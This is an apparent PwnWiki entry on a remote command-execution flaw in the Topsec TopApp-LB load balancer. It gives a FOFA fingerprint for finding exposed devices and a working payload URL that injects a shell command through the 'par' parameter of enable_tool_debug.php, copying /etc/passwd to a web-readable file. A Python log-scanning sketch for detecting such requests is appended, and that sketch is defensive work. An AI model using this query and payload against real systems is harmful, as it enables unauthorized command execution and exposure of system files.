Topsec TopApp-LB load balancer enable tool debug.php remote command execution vulnerability

From PwnWiki
Revision as of 12:02, 29 June 2021 by Pwnwiki

FOFA

app="天融信-TopApp-LB-负载均衡系统"

Payload

Set val=0 and tool=1, then concatenate a command onto the par parameter, which results in remote command execution:

/acc/tools/enable_tool_debug.php?val=0&tool=1&par=127.0.0.1' | cat /etc/passwd > ../../test.txt |'
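
A detection sketch for the request shown above, added here as an example and not part of the original page: it flags access-log entries that reach `enable_tool_debug.php` with a `par` value that is not a plain host or IP. The log format, the sample lines, and the assumption that `par` normally carries only a host or IP are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

TARGET_PATH = "/acc/tools/enable_tool_debug.php"
# Assumption: a legitimate `par` value is a bare IP address or hostname.
SAFE_PAR = re.compile(r"[A-Za-z0-9.:-]{1,255}")
# Request line of a combined-format access log entry (format is assumed).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [29/Jun/2021:12:02:11 +0000] "GET /acc/tools/'
    'enable_tool_debug.php?val=0&tool=1&par=127.0.0.1 HTTP/1.1" 200 12',
    '203.0.113.50 - - [29/Jun/2021:12:03:40 +0000] "GET /acc/tools/'
    'enable_tool_debug.php?val=0&tool=1&par=127.0.0.1%27%20%7C%20cat%20/etc/'
    'passwd%20%3E%20../../test.txt%20%7C%27 HTTP/1.1" 200 0',
    '198.51.100.7 - - [29/Jun/2021:12:04:02 +0000] "GET /index.php?par=a%7Cb '
    'HTTP/1.1" 200 512',
]

def suspicious_par(log_line):
    """Return the decoded `par` value when the line hits the endpoint with a
    `par` that is not a plain host/IP; otherwise return None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    # Decode and collapse repeated slashes so "//acc//tools/..." still matches.
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if not path.endswith(TARGET_PATH):
        return None
    for value in parse_qs(query, keep_blank_values=True).get("par", []):
        if not SAFE_PAR.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_par) for every flagged line."""
    hits = []
    for line in lines:
        value = suspicious_par(line)
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, par in scan(SAMPLE_LOG):
        print(f"ALERT {ip} par={par!r}")
```

The allowlist check catches quotes, pipes, spaces and redirection characters in one rule, so it does not depend on the exact command appended to `par`.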